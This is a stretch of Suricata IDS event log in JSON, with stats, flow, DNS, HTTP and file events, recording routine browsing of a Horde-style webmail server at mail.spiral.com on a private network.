{"timestamp":"2020-02-29T00:09:21.000257+0000","event_type":"stats","stats":{"uptime":14213,"capture":{"kernel_packets":134227,"kernel_drops":0},"decoder":{"pkts":134227,"bytes":92710169,"invalid":185,"ipv4":132756,"ipv6":8,"ethernet":134227,"raw":0,"null":0,"sll":0,"tcp":127572,"udp":4984,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2731,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2747,"synack":2738,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1772,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2274,"failed_udp":110},"tx":{"http":4570,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2353}},"flow_mgr":{"closed_pruned":2712,"new_pruned":15,"est_pruned":2325,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked"
:65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19839,"memcap_state":0,"memcap_global":0},"http":{"memuse":1937,"memcap":0}}} {"timestamp":"2020-02-29T00:09:23.000410+0000","flow_id":1027835779501480,"event_type":"flow","src_ip":"192.168.10.122","src_port":40419,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:22.216488+0000","end":"2020-02-29T00:04:22.321659+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:24.000231+0000","flow_id":1696278719705921,"event_type":"flow","src_ip":"192.168.10.122","src_port":56324,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:04:23.537409+0000","end":"2020-02-29T00:04:23.642729+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:24.001086+0000","flow_id":871752373023523,"event_type":"flow","src_ip":"192.168.10.122","src_port":50439,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:22.963363+0000","end":"2020-02-29T00:04:23.068671+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:24.001803+0000","flow_id":1497310064742804,"event_type":"flow","src_ip":"192.168.10.122","src_port":56584,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:04:23.725396+0000","end":"2020-02-29T00:04:23.830890+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:09:26.000361+0000","flow_id":1446393227616656,"event_type":"flow","src_ip":"192.168.10.122","src_port":43939,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:25.434576+0000","end":"2020-02-29T00:04:25.539965+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:26.001140+0000","flow_id":533480764378464,"event_type":"flow","src_ip":"192.168.10.81","src_port":52706,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1291,"bytes_toclient":1062,"start":"2020-02-29T00:08:20.363872+0000","end":"2020-02-29T00:08:25.580042+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:27.000298+0000","flow_id":2004988097150431,"event_type":"flow","src_ip":"192.168.10.130","src_port":34760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":18,"bytes_toserver":2119,"bytes_toclient":16868,"start":"2020-02-29T00:07:43.802271+0000","end":"2020-02-29T00:08:26.308021+0000","age":43,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:09:28.000219+0000","event_type":"stats","stats":{"uptime":14220,"capture":{"kernel_packets":134227,"kernel_drops":0},"decoder":{"pkts":134227,"bytes":92710169,"invalid":185,"ipv4":132756,"ipv6":8,"ethernet":134227,"raw":0,"null":0,"sll":0,"tcp":127572,"udp":4984,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2731,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2747,"synack":2738,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1772,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2274,"failed_udp":110},"tx":{"http":4570,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2353}},"flow_mgr":{"closed_pruned":2712,"new_pruned":15,"est_pruned":2329,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65531,"rows_empty":3,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18186,"memcap_state":0,"memcap_global":0},"http":{"memuse":1777,"memcap":0}}} 
{"timestamp":"2020-02-29T00:09:28.001781+0000","flow_id":2038445879581300,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"154.11.146.39","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:04:27.449140+0000","end":"2020-02-29T00:04:27.609675+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:30.000677+0000","flow_id":1612243390009016,"event_type":"flow","src_ip":"192.168.10.122","src_port":57135,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:29.495288+0000","end":"2020-02-29T00:04:29.600386+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:33.000442+0000","flow_id":1188136844541723,"event_type":"flow","src_ip":"192.168.10.122","src_port":47715,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:32.278299+0000","end":"2020-02-29T00:04:32.386792+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:33.000771+0000","flow_id":1403928886416178,"event_type":"flow","src_ip":"192.168.10.122","src_port":46632,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:32.103218+0000","end":"2020-02-29T00:04:32.211965+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:09:35.000237+0000","event_type":"stats","stats":{"uptime":14227,"capture":{"kernel_packets":134227,"kernel_drops":0},"decoder":{"pkts":134227,"bytes":92710169,"invalid":185,"ipv4":132756,"ipv6":8,"ethernet":134227,"raw":0,"null":0,"sll":0,"tcp":127572,"udp":4984,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091872},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2731,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2747,"synack":2738,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1772,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2274,"failed_udp":110},"tx":{"http":4570,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2353}},"flow_mgr":{"closed_pruned":2714,"new_pruned":15,"est_pruned":2334,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":0,"flows_timeout":3,"flows_timeout_inuse":1,"flows_removed":2,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17193,"memcap_state":0,"memcap_global":0},"http":{"memuse":1777,"memcap":0}}} 
{"timestamp":"2020-02-29T00:09:40.005609+0000","flow_id":1506149123404467,"event_type":"flow","src_ip":"192.168.10.130","src_port":34768,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":12,"bytes_toserver":1233,"bytes_toclient":9789,"start":"2020-02-29T00:08:26.307891+0000","end":"2020-02-29T00:08:38.282721+0000","age":12,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:40.919718+0000","flow_id":653855817992358,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49092,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64267,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:41.000832+0000","flow_id":384277881088369,"event_type":"flow","src_ip":"192.168.10.122","src_port":53660,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:40.321905+0000","end":"2020-02-29T00:04:40.431524+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:41.001029+0000","flow_id":2230598437064297,"event_type":"flow","src_ip":"192.168.10.130","src_port":34770,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":314,"bytes_toclient":820,"start":"2020-02-29T00:08:26.872041+0000","end":"2020-02-29T00:08:27.455695+0000","age":1,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"17","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:09:41.028314+0000","flow_id":653855817992358,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49092,"proto":"UDP","dns":{"type":"answer","id":64267,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:41.028314+0000","flow_id":653855817992358,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49092,"proto":"UDP","dns":{"type":"answer","id":64267,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:41.226094+0000","flow_id":1979596258201268,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34780,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6978}} 
{"timestamp":"2020-02-29T00:09:42.000194+0000","event_type":"stats","stats":{"uptime":14234,"capture":{"kernel_packets":134231,"kernel_drops":0},"decoder":{"pkts":134235,"bytes":92711293,"invalid":185,"ipv4":132764,"ipv6":8,"ethernet":134235,"raw":0,"null":0,"sll":0,"tcp":127579,"udp":4985,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2732,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2748,"synack":2739,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1772,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2275,"failed_udp":110},"tx":{"http":4571,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2354}},"flow_mgr":{"closed_pruned":2715,"new_pruned":15,"est_pruned":2334,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17193,"memcap_state":0,"memcap_global":0},"http":{"memuse":87370,"memcap":0}}} 
{"timestamp":"2020-02-29T00:09:44.645754+0000","flow_id":1943479878474362,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41241,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49461,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:44.754265+0000","flow_id":1943479878474362,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41241,"proto":"UDP","dns":{"type":"answer","id":49461,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:44.754265+0000","flow_id":1943479878474362,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41241,"proto":"UDP","dns":{"type":"answer","id":49461,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:44.893739+0000","flow_id":1388849276691051,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7849}} {"timestamp":"2020-02-29T00:09:46.232090+0000","flow_id":1979596258201268,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34780,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6978},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37764,"tx_id":0}} {"timestamp":"2020-02-29T00:09:49.000241+0000","event_type":"stats","stats":{"uptime":14241,"capture":{"kernel_packets":134266,"kernel_drops":0},"decoder":{"pkts":134270,"bytes":92729762,"invalid":185,"ipv4":132795,"ipv6":8,"ethernet":134270,"raw":0,"null":0,"sll":0,"tcp":127607,"udp":4988,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2733,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2749,"synack":2740,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1774,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2276,"failed_udp":110},"tx":{"http":4572,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2355}},"flow_mgr":{"closed_pruned":2716,"new_pruned":15,"est_pruned":2335,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":17523,"memcap_state":0,"memcap_global":0},"http":{"memuse
":156103,"memcap":0}}} {"timestamp":"2020-02-29T00:09:49.081618+0000","flow_id":1388849276691051,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52712,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7849},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":43730,"tx_id":0}} {"timestamp":"2020-02-29T00:09:49.091380+0000","flow_id":1254571419460852,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45436,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5327,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:49.199155+0000","flow_id":1254571419460852,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45436,"proto":"UDP","dns":{"type":"answer","id":5327,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:49.199155+0000","flow_id":1254571419460852,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45436,"proto":"UDP","dns":{"type":"answer","id":5327,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:49.265090+0000","flow_id":1388849276691051,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5367}} {"timestamp":"2020-02-29T00:09:51.000277+0000","flow_id":1140587262819103,"event_type":"flow","src_ip":"192.168.10.122","src_port":54066,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:50.047903+0000","end":"2020-02-29T00:04:50.157141+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:52.533076+0000","flow_id":280640340632148,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52733,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":33863,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:52.641396+0000","flow_id":280640340632148,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52733,"proto":"UDP","dns":{"type":"answer","id":33863,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:52.641396+0000","flow_id":280640340632148,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52733,"proto":"UDP","dns":{"type":"answer","id":33863,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:52.717546+0000","flow_id":1083094850400979,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34782,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608}} {"timestamp":"2020-02-29T00:09:54.266549+0000","flow_id":1388849276691051,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52712,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5367},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":27082,"tx_id":1}} {"timestamp":"2020-02-29T00:09:56.000232+0000","event_type":"stats","stats":{"uptime":14248,"capture":{"kernel_packets":134300,"kernel_drops":0},"decoder":{"pkts":134303,"bytes":92744834,"invalid":185,"ipv4":132828,"ipv6":8,"ethernet":134303,"raw":0,"null":0,"sll":0,"tcp":127636,"udp":4992,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092736},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2734,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2750,"synack":2741,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1775,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"m
sn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2278,"failed_udp":110},"tx":{"http":4574,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2357}},"flow_mgr":{"closed_pruned":2716,"new_pruned":15,"est_pruned":2336,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":17853,"memcap_state":0,"memcap_global":0},"http":{"memuse":122345,"memcap":0}}} {"timestamp":"2020-02-29T00:09:57.718624+0000","flow_id":1083094850400979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34782,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":20700,"tx_id":0}} {"timestamp":"2020-02-29T00:09:58.000585+0000","flow_id":2027510894811779,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"192.99.2.8","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:04:57.449155+0000","end":"2020-02-29T00:04:57.553288+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
